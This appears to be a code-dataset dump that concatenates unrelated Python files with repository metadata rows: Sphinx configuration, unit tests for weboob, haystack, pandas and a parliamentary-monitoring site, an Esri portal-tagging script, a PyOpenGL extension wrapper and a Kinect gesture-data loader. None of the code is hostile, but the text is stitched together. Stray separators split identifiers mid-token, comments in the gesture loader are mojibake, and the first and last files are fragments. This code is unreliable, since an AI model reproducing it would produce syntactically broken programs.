u'Juan BC', 'manual'),
]
# -- Options for manual page output ---------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
(master_doc, 'scikit-criteria', u'Scikit-Criteria Documentation',
[author], 1)
]
# -- Options for Texinfo output -------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
(master_doc, 'Scikit-Criteria', u'Scikit-Criteria Documentation',
author, 'Scikit-Criteria', 'One line description of project.',
'Miscellaneous'),
]
# Example configuration for intersphinx: refer to the Python standard library.
intersphinx_mapping = {'https://docs.python.org/': None}
def setup(app):
app.add_stylesheet('css/skcriteria.css')
app.add_javascript('js/skcriteria.js')
|
vicnet/weboob | modules/presseurop/test.py | Python | lgpl-3.0 | 1,158 | 0 | # -*- coding: utf-8 -*-
# Copyright(C) 2012 Florent Fourcot
#
# This file is part of a weboob module.
#
# This weboob module is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This weboob module is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along | with this weboob module | . If not, see <http://www.gnu.org/licenses/>.
from weboob.tools.test import BackendTest
from weboob.tools.value import Value
class PresseuropTest(BackendTest):
MODULE = 'presseurop'
def setUp(self):
if not self.is_backend_configured():
self.backend.config['lang'] = Value(value='fr')
def test_new_messages(self):
for message in self.backend.iter_unread_messages():
pass
|
Esri/ops-server-config | Publish/Portal/PrepItemsForExtract.py | Python | apache-2.0 | 5,238 | 0.007064 | #!/usr/bin/env python
#------------------------------------------------------------------------------
# Copyright 2015 Esri
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#==============================================================================
#Name: PrepItemsForExtract.py
#
#Purpose: Prepare portal items for extract:
# - Add "Hosted Service" tag to hosted service items
#
#==============================================================================
import sys
import os
import traceback
import logging
from portalpy import Portal
from FindOrphanedHostedServices import get_hosted_service_items
logging.basicConfig()
def format_hosted_item_info(item):
itemID = item.get('id')
itemTitle = item.get('title')
itemOwner = item.get('owner')
itemType = item.get('type')
itemURL = item.get('url')
service = itemURL.split('/Hosted/')[1]
return "Id: {:<34}Owner: {:<22}Type: {:<17}URL: {:<50}Title: {:<30}".format(
itemID, itemOwner, itemType, service, itemTitle)
def format_item_info(item):
itemID = item.get('id')
itemTitle = item.get('title')
itemOwner = item.get('owner')
itemType = item.get('type')
return "Id: {:<34}Owner: {:<25}Type: {:25}Title: {:<40}".format(
itemID, itemOwner, itemType, itemTitle)
def print_args():
""" Print script arguments """
if len(sys.argv) < 4:
print '\n' + os.path.basename(sys.argv[0]) + \
' <PortalURL>' \
' <AdminUser>' \
' <AdminUserPassword>'
print '\nWhere:'
print '\n\t<PortalURL> (required): URL of Portal ' \
'(i.e. https://fully_qualified_domain_name/arcgis)'
print '\n\t<AdminUser> (required): Primary portal administrator user.'
print '\n\t<AdminUserPassword> (required): Password for AdminUser.'
return None
else:
# Set variables from parameter values
portal_address = sys.argv[1]
adminuser = sys.argv[2]
password = sys.argv[3]
return portal_address, adminuser, password
def main():
exit_err_code = 1
# Print/get script arguments
results = print_args()
if not results:
sys.exit(exit_err_code)
portal_address, adminuser, pas | sword = results
total_success = True
title_break_count = 100
section_break_count = 75
search_query = None
print '=' * title_break_count
print 'Prepare Items for Extract'
print '=' * title_break_count
try:
portal = Portal(portal_address, adminuser, password)
items = po | rtal.search(q=search_query, sort_field='owner')
# ---------------------------------------------------------------------
# Prepare hosted service items
# ---------------------------------------------------------------------
# Add new tag to hosted service so we can identify the original
# hosted service after the portal items are published to a new portal
new_tags = ['Hosted Service']
print '\n{}'.format('-' * section_break_count)
print '- Prepare Hosted Service Items (Add tags: {})...'.format(', '.join(new_tags))
items_to_prep = get_hosted_service_items(portal, items)
for item_to_prep in items_to_prep:
print '\n {}'.format(format_hosted_item_info(item_to_prep))
tags = item_to_prep.get('tags')
for new_tag in new_tags:
if new_tag not in tags:
tags.append(new_tag)
# NOTE: have to pass new tags as string and not as a list
resp = portal.update_item(item_to_prep['id'], {'tags':', '.join(tags)})
if not resp:
print '***ERROR encountered during "update_item".'
total_success = False
except:
total_success = False
# Get the traceback object
tb = sys.exc_info()[2]
tbinfo = traceback.format_tb(tb)[0]
# Concatenate information together concerning the error
# into a message string
pymsg = "PYTHON ERRORS:\nTraceback info:\n" + tbinfo + \
"\nError Info:\n" + str(sys.exc_info()[1])
# Print Python error messages for use in Python / Python Window
print
print "***** ERROR ENCOUNTERED *****"
print pymsg + "\n"
finally:
print '\nDone.'
if total_success:
sys.exit(0)
else:
sys.exit(exit_err_code)
if __name__ == "__main__":
main()
|
trolldbois/python-haystack | test/haystack/test_utils.py | Python | gpl-3.0 | 12,507 | 0.000959 | # -*- coding: utf-8 -*-
"""Tests haystack.utils ."""
import haystack.model
# init ctypes with a controlled type size
import ctypes
import logging
import unittest
import os
from haystack import model
from haystack import utils
from haystack import types
from haystack import target
from haystack.mappings.process import make_process_memory_handler, make_local_memory_handler
class TestHelpers(unittest.TestCase):
"""Tests helpers functions."""
def setUp(self):
pass
def tearDown(self):
pass
def test_is_address_local(self):
my_target = target.TargetPlatform.make_target_platform | _local()
my_ctypes = my_target.get_target_ctype | s()
my_utils = my_target.get_target_ctypes_utils()
ctypes5_gen64 = haystack.model.import_module_for_target_ctypes("test.src.ctypes5_gen64", my_ctypes)
# kinda chicken and egg here...
# one call
mappings = make_local_memory_handler()
m = mappings.get_mappings()[0]
# struct a - basic types
s = ctypes.sizeof(ctypes5_gen64.struct_a)
a = ctypes5_gen64.struct_a.from_address(m.start)
pa = my_ctypes.c_void_p(m.start)
ptr_a = my_ctypes.POINTER(ctypes5_gen64.struct_a)(a)
b = ctypes5_gen64.struct_a.from_address(m.end - s)
pb = my_ctypes.c_void_p(m.end - s)
ptr_b = my_ctypes.POINTER(ctypes5_gen64.struct_a)(b)
c = ctypes5_gen64.struct_a.from_address(m.end - 1)
pc = my_ctypes.c_void_p(m.end - 1)
ptr_c = my_ctypes.POINTER(ctypes5_gen64.struct_a)(c)
self.assertTrue(my_utils.is_address_local(pa, structType=None))
self.assertTrue(
my_utils.is_address_local(
pa,
structType=ctypes5_gen64.struct_a))
self.assertTrue(my_utils.is_address_local(ptr_a, structType=None))
self.assertTrue(
my_utils.is_address_local(
ptr_a,
structType=ctypes5_gen64.struct_a))
self.assertTrue(my_utils.is_address_local(pb, structType=None))
self.assertTrue(
my_utils.is_address_local(
pb,
structType=ctypes5_gen64.struct_a))
self.assertTrue(my_utils.is_address_local(ptr_b, structType=None))
self.assertTrue(
my_utils.is_address_local(
ptr_b,
structType=ctypes5_gen64.struct_a))
self.assertTrue(my_utils.is_address_local(pc, structType=None))
self.assertFalse(
my_utils.is_address_local(
pc,
structType=ctypes5_gen64.struct_a))
self.assertTrue(my_utils.is_address_local(ptr_c, structType=None))
self.assertFalse(
my_utils.is_address_local(
ptr_c,
structType=ctypes5_gen64.struct_a))
def test_pointer2bytes(self):
my_target = target.TargetPlatform.make_target_platform_local()
my_ctypes = my_target.get_target_ctypes()
my_utils = my_target.get_target_ctypes_utils()
class X(my_ctypes.Structure):
_fields_ = [('a', my_ctypes.c_long)]
nb = 3
x = (nb * X)()
x[2].a = 42
ptr = my_ctypes.POINTER(X)(x[0])
bytes_x = my_utils.pointer2bytes(ptr, nb)
self.assertEqual(len(bytes_x), my_ctypes.sizeof(x))
self.assertEqual(
bytes_x,
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00*\x00\x00\x00\x00\x00\x00\x00')
pass
def test_formatAddress(self):
my_utils64 = utils.Utils(types.build_ctypes_proxy(8, 8, 16))
my_utils32 = utils.Utils(types.build_ctypes_proxy(4, 4, 8))
x = my_utils64.formatAddress(0x12345678)
self.assertEqual('0x0000000012345678', x)
# 32b
x = my_utils32.formatAddress(0x12345678)
self.assertEqual('0x12345678', x)
def test_unpackWord(self):
# 64b
my_utils = utils.Utils(types.build_ctypes_proxy(8, 8, 16))
one = b'\x01' + 7 * b'\x00'
x = my_utils.unpackWord(one)
self.assertEqual(x, 1)
# 32b
my_utils = utils.Utils(types.build_ctypes_proxy(4, 4, 8))
one32 = b'\x01' + 3 * b'\x00'
x = my_utils.unpackWord(one32)
self.assertEqual(x, 1)
pass
# endianness
two32 = 3 * b'\x00' + b'\x02'
x = my_utils.unpackWord(two32, '>')
self.assertEqual(x, 2)
pass
def test_get_pointee_address(self):
"""tests get_pointee_address on host ctypes POINTER and haystack POINTER"""
my_ctypes = types.build_ctypes_proxy(8, 8, 16)
my_utils = utils.Utils(my_ctypes)
class X(my_ctypes.Structure):
_pack_ = True
_fields_ = [('a', my_ctypes.c_long),
('p', my_ctypes.POINTER(my_ctypes.c_int)),
('b', my_ctypes.c_ubyte)]
self.assertEqual(my_ctypes.sizeof(X), 17)
i = X.from_buffer_copy(
b'\xAA\xAA\xBB\xBB' +
4 *
b'\xBB' +
8 *
b'\x11' +
b'\xCC')
a = my_utils.get_pointee_address(i.p)
self.assertEqual(my_ctypes.sizeof(i.p), 8)
self.assertNotEquals(a, 0)
self.assertEqual(a, 0x1111111111111111) # 8*'\x11'
# null pointer
i = X.from_buffer_copy(
b'\xAA\xAA\xBB\xBB' +
4 *
b'\xBB' +
8 *
b'\x00' +
b'\xCC')
pnull = my_utils.get_pointee_address(i.p)
self.assertEquals (my_utils.get_pointee_address(pnull), 0)
# change arch, and retry
my_ctypes = types.build_ctypes_proxy(4, 4, 8)
class Y(ctypes.Structure):
_pack_ = True
_fields_ = [('a', my_ctypes.c_long),
('p', my_ctypes.POINTER(my_ctypes.c_int)),
('b', my_ctypes.c_ubyte)]
self.assertEqual(my_ctypes.sizeof(Y), 9)
i = Y.from_buffer_copy(b'\xAA\xAA\xBB\xBB' + 4 * b'\x11' + b'\xCC')
a = my_utils.get_pointee_address(i.p)
self.assertEqual(my_ctypes.sizeof(i.p), 4)
self.assertNotEquals(a, 0)
self.assertEqual(a, 0x11111111) # 4*'\x11'
# null pointer
i = Y.from_buffer_copy(b'\xAA\xAA\xBB\xBB' + 4 * b'\x00' + b'\xCC')
pnull = my_utils.get_pointee_address(i.p)
self.assertEquals (my_utils.get_pointee_address(pnull), 0)
# non-pointer, and void null pointer
my_ctypes = types.load_ctypes_default()
i = my_ctypes.c_int(69)
self.assertEquals (my_utils.get_pointee_address(i), 0)
pnull = my_ctypes.c_void_p(0)
self.assertEquals (my_utils.get_pointee_address(pnull), 0)
pass
def test_offsetof(self):
"""returns the offset of a member fields in a record"""
my_ctypes = types.build_ctypes_proxy(4, 4, 8)
my_utils = utils.Utils(my_ctypes)
class Y(my_ctypes.Structure):
_pack_ = True
_fields_ = [('a', my_ctypes.c_long),
('p', my_ctypes.POINTER(my_ctypes.c_int)),
('b', my_ctypes.c_ubyte)]
o = my_utils.offsetof(Y, 'b')
self.assertEqual(o, 8)
my_ctypes = types.build_ctypes_proxy(8, 8, 16)
my_utils = utils.Utils(my_ctypes)
class X(my_ctypes.Structure):
_pack_ = True
_fields_ = [('a', my_ctypes.c_long),
('p', my_ctypes.POINTER(my_ctypes.c_int)),
('b', my_ctypes.c_ubyte)]
o = my_utils.offsetof(X, 'b')
self.assertEqual(o, 16)
class X2(my_ctypes.Union):
_pack_ = True
_fields_ = [('a', my_ctypes.c_long),
('p', my_ctypes.POINTER(my_ctypes.c_int)),
('b', my_ctypes.c_ubyte)]
o = my_utils.offsetof(X2, 'b')
self.assertEqual(o, 0)
pass
def test_container_of(self):
"""From a pointer to a member, returns the parent struct"""
# depends on offsetof
my_ctypes = types.build_ctypes_proxy(8, 8, 16)
my_utils = utils. |
jreback/pandas | pandas/tests/arrays/test_timedeltas.py | Python | bsd-3-clause | 12,380 | 0.000889 | import numpy as np
import pytest
import pandas as pd
from pandas import Timedelta
import pandas._testing as tm
from pandas.core import nanops
from pandas.core.arrays import TimedeltaArray
class TestTimedeltaArrayConstructor:
def test_only_1dim_accepted(self):
# GH#25282
arr = np.array([0, 1, 2, 3], dtype="m8[h]").astype("m8[ns]")
with pytest.raises(ValueError, match="Only 1-dimensional"):
# 3-dim, we allow 2D to sneak in for ops purposes GH#29853
TimedeltaArray(arr.reshape(2, 2, 1))
with pytest.raises(ValueError, match="Only 1-dimensional"):
# 0-dim
TimedeltaArray(arr[[0]].squeeze())
def test_freq_validation(self):
# ensure that the public constructor cannot create an invalid instance
arr = np.array([0, 0, 1], dtype=np.int64) * 3600 * 10 ** 9
msg = (
"Inferred frequency None from passed values does not "
"conform to passed frequency D"
)
with pytest.raises(ValueError, match=msg):
TimedeltaArray(arr.view("timedelta64[ns]"), freq="D")
def test_non_array_raises(self):
with pytest.raises(ValueError, match="list"):
TimedeltaArray([1, 2, 3])
def test_other_type_raises(self):
with pytest.raises(ValueError, match="dtype bool cannot be converted"):
TimedeltaArray(np.array([1, 2, 3], dtype="bool"))
def test_incorrect_dtype_raises(self):
# TODO: why TypeError for 'category' but ValueError for i8?
with pytest.raises(
ValueError, match=r"category cannot be converted to timedelta64\[ns\]"
):
TimedeltaArray(np.array([1, 2, 3], dtype="i8"), dtype="category")
with pytest.raises(
ValueError, match=r"dtype int64 cannot be converted to timedelta64\[ns\]"
):
TimedeltaArray(np.array([1, 2, 3], dtype="i8"), dtype=np.dtype("int64"))
def test_copy(self):
data = np.array([1, 2, 3], dtype="m8[ns]")
arr = TimedeltaArray(data, copy=False)
assert arr._data is data
arr = TimedeltaArray(data, copy=True)
assert arr._data is not data
assert arr._data.base is not data
class TestTimedeltaArray:
# TODO: de-duplicate with test_npsum below
def test_np_sum(self):
# GH#25282
vals = np.arange(5, dtype=np.int64).view("m8[h]").astype("m8[ns]")
arr = TimedeltaArray(vals)
result = np.sum(arr)
assert result == vals.sum()
result = np.sum(pd.TimedeltaIndex(arr))
assert result == vals.sum()
def test_from_sequence_dtype(self):
msg = "dtype .*object.* cannot be converted to timedelta64"
with pytest.raises(ValueError, match=msg):
TimedeltaArray._from_sequence([], dtype=object)
@pytest.mark.parametrize("dtype", [int, np.int32, np.int64, "uint32", "uint64"])
def test_astype_int(self, dtype):
arr = TimedeltaArray._from_sequence([Timedelta("1H"), Timedelta("2H")])
with tm.assert_produces_warning(FutureWarning):
# astype(int..) deprecated
result = arr.astype(dtype)
if np.dtype(dtype).kind == "u":
expected_dtype = np.dtype("uint64")
else:
expected_dtype = np.dtype("int64")
with tm.assert_produces_warning(FutureWarning):
# astype(int..) deprecated
expected = arr.astype(expected_dtype)
assert result.dtype == expected_dtype
tm.assert_numpy_array_equal(result, expected)
def test_setitem_clears_freq(self):
a = TimedeltaArray(pd.timedelta_range("1H", periods=2, freq="H"))
a[0] = Timedelta("1H")
assert a.freq is None
@pytest.mark.parametrize(
"obj",
[
Timedelta(seconds=1),
Timedelta(seconds=1).to_timedelta64(),
Timedelta(seconds=1).to_pytimedelta(),
],
)
def test_setitem_objects(self, obj):
# make sure we accept timedelta64 and timedelta in addition to Timedelta
tdi = pd.timedelta_range("2 Days", periods=4, freq="H")
arr = TimedeltaArray(tdi, freq=tdi.freq)
arr[0] = obj
assert arr[0] == Timedelta(seconds=1)
@pytest.mark.parametrize(
"other",
[
1,
np.int64(1),
1.0,
np.datetime64("NaT"),
pd.Timestamp.now(),
"invalid",
np.arange(10, dtype="i8") * 24 * 3600 * 10 ** 9,
(np.arange(10) * 24 * 3600 * 10 ** 9).view("datetime64[ns]"),
pd.Timestamp.now().to_period("D"),
],
)
@pytest.mark.parametrize("index", [True, False])
def test_searchsorted_invalid_types(self, other, index):
data = np.arange(10, dtype="i8") * 24 * 3600 * 10 ** 9
arr = TimedeltaArray(data, freq="D")
if index:
arr = pd.Index(arr)
msg = "|".join(
[
"searchsorted requires compatible dtype or scalar",
"value should be a 'Timedelta', 'NaT', or array of those. Got",
]
)
with pytest.raises(TypeError, match=msg):
arr.searchsorted(other)
class TestUnaryOps:
def test_abs(self):
vals = np.array([-3600 * 10 ** 9, "NaT", 7200 * 10 ** 9], dtype="m8[ns]")
arr = TimedeltaArray(vals)
evals = np.array([3600 * 10 ** 9, "NaT", 7200 * 10 ** 9], dtype="m8[ns]")
expected = TimedeltaArray(evals)
result = abs(arr)
tm.assert_timedelta_array_equal(result, expected)
def test_neg(self):
vals = np.array([-3600 * 10 ** 9, "NaT", 7200 * 10 ** 9], dtype="m8[ns]")
arr = TimedeltaArray(vals)
evals = np.array([3600 * 10 ** 9, "NaT", -7200 * 10 ** 9], dtype="m8[ns]")
expected = TimedeltaArray(evals)
result = -arr
tm.assert_timedelta_array_equal(result, expected)
def test_neg_freq(self):
tdi = pd.timedelta_range("2 Days", periods=4, freq="H")
arr = TimedeltaArray(tdi, freq=tdi.freq)
expected = TimedeltaArray(-tdi._data, freq=-tdi.freq)
result = -arr
tm.assert_timedelta_array_equal(result, expected)
class TestReductions:
@pytest.mark.parametrize("name", ["std", "min", "max", "median", "mean"])
@pytest.mark.parametrize("skipna", [True, False])
def test_reductions_empty(self, name, skipna):
tdi = pd.TimedeltaIndex([])
arr = tdi.array
result = getattr(tdi, name)(skipna=skipna)
assert result is pd.NaT
result = getattr(arr, name)(skipna=skipna)
assert result is pd.NaT
@pytest.mark.parametrize("skipna", [True, Fal | se])
def test_sum_empty(self, skipna):
tdi = pd.TimedeltaIndex([])
arr = tdi.array
result = tdi.sum(skipna=skipna)
assert isinstance(result, Timedelta)
assert result == Timedelta(0)
result = arr.sum(skipna=skipna)
assert isinstance(result, Timedelta)
assert result == Timedelta(0)
def test_min_max(self):
arr = | TimedeltaArray._from_sequence(["3H", "3H", "NaT", "2H", "5H", "4H"])
result = arr.min()
expected = Timedelta("2H")
assert result == expected
result = arr.max()
expected = Timedelta("5H")
assert result == expected
result = arr.min(skipna=False)
assert result is pd.NaT
result = arr.max(skipna=False)
assert result is pd.NaT
def test_sum(self):
tdi = pd.TimedeltaIndex(["3H", "3H", "NaT", "2H", "5H", "4H"])
arr = tdi.array
result = arr.sum(skipna=True)
expected = Timedelta(hours=17)
assert isinstance(result, Timedelta)
assert result == expected
result = tdi.sum(skipna=True)
assert isinstance(result, Timedelta)
assert result == expected
result = arr.sum(skipna=False)
assert result is pd.NaT
result = tdi.sum(skipna=False)
assert result is pd.NaT
result = arr.sum(min_count=9)
assert result is pd.NaT
result = tdi.sum(min_count=9)
|
D4wN/brickv | src/build_data/windows/OpenGL/GL/ARB/fragment_program.py | Python | gpl-2.0 | 3,247 | 0.028334 | '''OpenGL extension ARB.fragment_program
This module customises the behaviour of the
OpenGL.raw.GL.ARB.fragment_program to provide a more
Python-friendly API
Overview (from the spec)
Unextended OpenGL mandates a certain set of configurable per-
fragment computations defining texture application, texture
environment, color sum, and fog operations. Several extensions have
added further per-fragment computations to OpenGL. For example,
extensions have defined new texture environment capabilities
(ARB_texture_env_add, ARB_texture_env_combine, ARB_texture_env_dot3,
ARB_texture_env_crossbar), per-fragment depth comparisons
(ARB_depth_texture, ARB_shadow, ARB_shadow_ambient,
EXT_shadow_funcs), per-fragment lighting (EXT_fragment_lighting,
EXT_light_texture), and environment mapped bump mapping
(ATI_envmap_bumpmap).
Each such extensi | on adds a small set of relatively inflexible per-
fragment computations.
This inflexibility is in contrast to the typical flexibility
provided by the underlying programmable floating point engines
(whether micro-coded fragment engines, DSPs, or CPUs) that are
traditionally used to implement OpenGL's texturing computations.
The purpose of this extension is to expose to the OpenGL application
writer a significant degree of per-fragment programmability for
computing fragm | ent parameters.
For the purposes of discussing this extension, a fragment program is
a sequence of floating-point 4-component vector operations that
determines how a set of program parameters (not specific to an
individual fragment) and an input set of per-fragment parameters are
transformed to a set of per-fragment result parameters.
The per-fragment computations for standard OpenGL given a particular
set of texture and fog application modes (along with any state for
extensions defining per-fragment computations) is, in essence, a
fragment program. However, the sequence of operations is defined
implicitly by the current OpenGL state settings rather than defined
explicitly as a sequence of instructions.
This extension provides an explicit mechanism for defining fragment
program instruction sequences for application-defined fragment
programs. In order to define such fragment programs, this extension
defines a fragment programming model including a floating-point
4-component vector instruction set and a relatively large set of
floating-point 4-component registers.
The extension's fragment programming model is designed for efficient
hardware implementation and to support a wide variety of fragment
programs. By design, the entire set of existing fragment programs
defined by existing OpenGL per-fragment computation extensions can
be implemented using the extension's fragment programming model.
The official definition of this extension is available here:
http://www.opengl.org/registry/specs/ARB/fragment_program.txt
'''
from OpenGL import platform, constants, constant, arrays
from OpenGL import extensions, wrapper
from OpenGL.GL import glget
import ctypes
from OpenGL.raw.GL.ARB.fragment_program import *
### END AUTOGENERATED SECTION
from OpenGL.GL import glget
glget.addGLGetConstant( GL_FRAGMENT_PROGRAM_ARB, (1,) ) |
xiawei0000/Kinectforactiondetect | ChalearnLAPSample.py | Python | mit | 41,779 | 0.017329 | # coding=gbk
#-------------------------------------------------------------------------------
# Name: Chalearn LAP sample
# Purpose: Provide easy access to Chalearn LAP challenge data samples
#
# Author: Xavier Baro
#
# Created: 21/01/2014
# Copyright: (c) Xavier Baro 2014
# Licence: <your licence>
#-------------------------------------------------------------------------------
import os
import zipfile
import shutil
import cv2
import numpy
import csv
from PIL import Image, ImageDraw
from scipy.misc import imresize
class Skeleton(object):
""" Class that represents the skeleton information """
"""¹Ç¼ÜÀ࣬ÊäÈë¹Ç¼ÜÊý¾Ý£¬½¨Á¢Àà"""
#define a class to encode skeleton data
def __init__(self,data):
""" Constructor. Reads skeleton information from given raw data """
# Create an object from raw data
self.joins=dict();
pos=0
self.joins['HipCenter']=(map(float,data[pos:pos+3]),map(float,data[pos+3:pos+7]),map(int,data[pos+7:pos+9]))
pos=pos+9
self.joins['Spine']=(map(float,data[pos:pos+3]),map(float,data[pos+3:pos+7]),map(int,data[pos+7:pos+9]))
pos=pos+9
self.joins['ShoulderCenter']=(map(float,data[pos:pos+3]),map(float,data[pos+3:pos+7]),map(int,data[pos+7:pos+9]))
pos=pos+9
self.joins['Head']=(map(float,data[pos:pos+3]),map(float,data[pos+3:pos+7]),map(int,data[pos+7:pos+9]))
pos=pos+9
self.joins['ShoulderLeft']=(map(float,data[pos:pos+3]),map(float,data[pos+3:pos+7]),map(int,data[pos+7:p | os+9]))
pos=pos+9
self.joins['ElbowLeft']=(map(float,data[pos:pos+3]),map(float,data[pos+3:pos+7]),map(int,data[pos+7:pos+9]))
pos=pos+9
self.joins['WristLeft']=(map(float,data[pos:pos+3]),map(float,data[pos+3:pos+7]),map(int,data[pos+7:pos+9]))
pos=pos+9
self.joins['HandLeft']=(map(float,data[pos:pos+3]),map(float,data[pos+3:pos+7]),map(int,data[pos+7:pos+9]))
pos=pos+9
self.joins['ShoulderRight']=(map(float,data[pos:pos+3]),map(float,data[pos | +3:pos+7]),map(int,data[pos+7:pos+9]))
pos=pos+9
self.joins['ElbowRight']=(map(float,data[pos:pos+3]),map(float,data[pos+3:pos+7]),map(int,data[pos+7:pos+9]))
pos=pos+9
self.joins['WristRight']=(map(float,data[pos:pos+3]),map(float,data[pos+3:pos+7]),map(int,data[pos+7:pos+9]))
pos=pos+9
self.joins['HandRight']=(map(float,data[pos:pos+3]),map(float,data[pos+3:pos+7]),map(int,data[pos+7:pos+9]))
pos=pos+9
self.joins['HipLeft']=(map(float,data[pos:pos+3]),map(float,data[pos+3:pos+7]),map(int,data[pos+7:pos+9]))
pos=pos+9
self.joins['KneeLeft']=(map(float,data[pos:pos+3]),map(float,data[pos+3:pos+7]),map(int,data[pos+7:pos+9]))
pos=pos+9
self.joins['AnkleLeft']=(map(float,data[pos:pos+3]),map(float,data[pos+3:pos+7]),map(int,data[pos+7:pos+9]))
pos=pos+9
self.joins['FootLeft']=(map(float,data[pos:pos+3]),map(float,data[pos+3:pos+7]),map(int,data[pos+7:pos+9]))
pos=pos+9
self.joins['HipRight']=(map(float,data[pos:pos+3]),map(float,data[pos+3:pos+7]),map(int,data[pos+7:pos+9]))
pos=pos+9
self.joins['KneeRight']=(map(float,data[pos:pos+3]),map(float,data[pos+3:pos+7]),map(int,data[pos+7:pos+9]))
pos=pos+9
self.joins['AnkleRight']=(map(float,data[pos:pos+3]),map(float,data[pos+3:pos+7]),map(int,data[pos+7:pos+9]))
pos=pos+9
self.joins['FootRight']=(map(float,data[pos:pos+3]),map(float,data[pos+3:pos+7]),map(int,data[pos+7:pos+9]))
def getAllData(self):
""" Return a dictionary with all the information for each skeleton node """
return self.joins
def getWorldCoordinates(self):
""" Get World coordinates for each skeleton node """
skel=dict()
for key in self.joins.keys():
skel[key]=self.joins[key][0]
return skel
def getJoinOrientations(self):
""" Get orientations of all skeleton nodes """
skel=dict()
for key in self.joins.keys():
skel[key]=self.joins[key][1]
return skel
def getPixelCoordinates(self):
""" Get Pixel coordinates for each skeleton node """
skel=dict()
for key in self.joins.keys():
skel[key]=self.joins[key][2]
return skel
def toImage(self,width,height,bgColor):
""" Create an image for the skeleton information """
SkeletonConnectionMap = (['HipCenter','Spine'],['Spine','ShoulderCenter'],['ShoulderCenter','Head'],['ShoulderCenter','ShoulderLeft'], \
['ShoulderLeft','ElbowLeft'],['ElbowLeft','WristLeft'],['WristLeft','HandLeft'],['ShoulderCenter','ShoulderRight'], \
['ShoulderRight','ElbowRight'],['ElbowRight','WristRight'],['WristRight','HandRight'],['HipCenter','HipRight'], \
['HipRight','KneeRight'],['KneeRight','AnkleRight'],['AnkleRight','FootRight'],['HipCenter','HipLeft'], \
['HipLeft','KneeLeft'],['KneeLeft','AnkleLeft'],['AnkleLeft','FootLeft'])
im = Image.new('RGB', (width, height), bgColor)
draw = ImageDraw.Draw(im)
for link in SkeletonConnectionMap:
p=self.getPixelCoordinates()[link[1]]
p.extend(self.getPixelCoordinates()[link[0]])
draw.line(p, fill=(255,0,0), width=5)
for node in self.getPixelCoordinates().keys():
p=self.getPixelCoordinates()[node]
r=5
draw.ellipse((p[0]-r,p[1]-r,p[0]+r,p[1]+r),fill=(0,0,255))
del draw
image = numpy.array(im)
image = cv2.cvtColor(image, cv2.COLOR_RGB2BGR)
return image
##ÊÖÊÆÊý¾ÝµÄÀ࣬ÊäÈë·¾¶£¬½¨Á¢ÊÖÊÆÊý¾ÝÀà
class GestureSample(object):
""" Class that allows to access all the information for a certain gesture database sample """
#define class to access gesture data samples
#³õʼ»¯£¬¶ÁÈ¡Îļþ
def __init__ (self,fileName):
""" Constructor. Read the sample file and unzip it if it is necessary. All the data is loaded.
sample=GestureSample('Sample0001.zip')
"""
# Check the given file
if not os.path.exists(fileName): #or not os.path.isfile(fileName):
raise Exception("Sample path does not exist: " + fileName)
# Prepare sample information
self.fullFile = fileName
self.dataPath = os.path.split(fileName)[0]
self.file=os.path.split(fileName)[1]
self.seqID=os.path.splitext(self.file)[0]
self.samplePath=self.dataPath + os.path.sep + self.seqID;
#ÅжÏÊÇzip»¹ÊÇĿ¼
# Unzip sample if it is necessary
if os.path.isdir(self.samplePath) :
self.unzip = False
else:
self.unzip = True
zipFile=zipfile.ZipFile(self.fullFile,"r")
zipFile.extractall(self.samplePath)
# Open video access for RGB information
rgbVideoPath=self.samplePath + os.path.sep + self.seqID + '_color.mp4'
if not os.path.exists(rgbVideoPath):
raise Exception("Invalid sample file. RGB data is not available")
self.rgb = cv2.VideoCapture(rgbVideoPath)
while not self.rgb.isOpened():
self.rgb = cv2.VideoCapture(rgbVideoPath)
cv2.waitKey(500)
# Open video access for Depth information
depthVideoPath=self.samplePath + os.path.sep + self.seqID + '_depth.mp4'
if not os.path.exists(depthVideoPath):
raise Exception("Invalid sample file. Depth data is not available")
self.depth = cv2.VideoCapture(depthVideoPath)
while not self.depth.isOpened():
self.depth = cv2.VideoCapture(depthVideoPath)
cv2.waitKey(500)
# Open video access for User segmentation information
userVideoPath=self.samplePath + os.path.sep + self.seqID + '_user.mp4'
if not os.path.exists(userVideoPath):
raise Exception("Invalid sample file. User segmentation data is not available")
self.user = cv2.VideoCapture(userVideoPath)
while not self.us |
Code4SA/pmg-cms-2 | tests/views/test_admin_view.py | Python | apache-2.0 | 894 | 0 | from tests import PMGLiveServerTestCase
from pmg.models import db
from tests.fixtures import dbfixture, UserData, RoleData
class TestAdminView(PMGLiveServerTestCase):
def setUp(self):
super(TestAdminView, self).setUp()
self.fx = dbfixture.data(RoleData, UserData,)
self.fx | .setup()
def tearDown(self):
self.fx.teardown()
super(TestAdminView, self).tearDown()
def test_admin_page_unauthorised(self):
| """
Test admin page (/admin) unauthorised
"""
self.make_request("/admin", follow_redirects=True)
self.assertIn("Login now", self.html)
def test_admin_page_authorised(self):
"""
Test admin page (/admin) authorised
"""
user = self.fx.UserData.admin
self.make_request("/admin", user, follow_redirects=True)
self.assertIn("Record counts", self.html)
|
Alberto-Beralix/Beralix | i386-squashfs-root/usr/lib/python2.7/dist-packages/duplicity/robust.py | Python | gpl-3.0 | 46 | 0.021739 | ../../.. | /../share/pyshared/dupl | icity/robust.py |
kizniche/Mycodo | mycodo/scripts/generate_manual_inputs_by_measure.py | Python | gpl-3.0 | 4,380 | 0.006164 | # -*- coding: utf-8 -*-
"""Generate markdown file of Input information to be inserted into the manual."""
import os
import sys
sys.path.append(os.path.abspath(os.path.join(__file__, "../../..")))
from collections import OrderedDict
from mycodo.utils.system_pi import add_custom_measurements
from mycodo.utils.system_pi import add_custom_units
